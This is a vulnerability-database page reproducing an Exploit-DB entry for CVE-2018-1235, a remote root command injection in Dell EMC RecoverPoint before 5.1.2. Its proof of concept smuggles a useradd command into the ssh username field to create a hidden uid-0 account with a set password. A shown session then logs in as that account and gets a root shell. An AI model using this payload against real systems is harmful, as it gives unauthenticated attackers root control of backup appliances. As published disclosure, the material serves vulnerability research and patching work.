Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution

🗓️ 21 Jun 2018 00:00:00Reported by Paul TaylorType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 67 Views

Dell EMC RecoverPoint OS command injection vulnerability allows unauthenticated root access via ssh service. (100 characters

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution Vulnerability
22 Jun 201800:00
zdt
0day.today		Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution Vulnerability
22 Jun 201800:00
zdt
CNVD		Dell EMC RecoverPoint and RecoverPoint for Virtual Machines Remote Code Execution Vulnerability
25 May 201800:00
cnvd
CVE		CVE-2018-1235
29 May 201817:00
cve
Cvelist		CVE-2018-1235
29 May 201817:00
cvelist
Exploit DB		Dell EMC RecoverPoint &lt; 5.1.2 - Local Root Command Execution
21 Jun 201800:00
exploitdb
exploitpack		Dell EMC RecoverPoint 5.1.2 - Local Root Command Execution
21 Jun 201800:00
exploitpack
exploitpack		Dell EMC RecoverPoint 5.1.2 - Remote Root Command Execution
21 Jun 201800:00
exploitpack
NVD		CVE-2018-1235
29 May 201817:29
nvd
Packet Storm		Dell EMC RecoverPoint Remote Root
21 Jun 201800:00
packetstorm
Rows per page
# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
# Date: 2018-06-21
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Exploit Author: Paul Taylor
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: CVE-2018-1235
 
# 1. Description
# An OS command injection vulnerability exists in the mechanism which processes usernames 
# which are presented for authentication, allowing unauthenticated root access via 
# the ssh service.
 
# 2. Proof of Concept
# Inject into ssh username.
# N.B. combined length of new username+password is limited to 21 due to injection length limitations

$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
Password: ^C
$ ssh [email protected]
Password: Secret123
Could not chdir to home directory /home/bao7uo: No such file or directory
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jun 2018 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 39.8
CVSS 210
EPSS0.5175
dell emc recoverpointos command injectionunauthenticated accessssh servicecve-2018-1235security vulnerability
67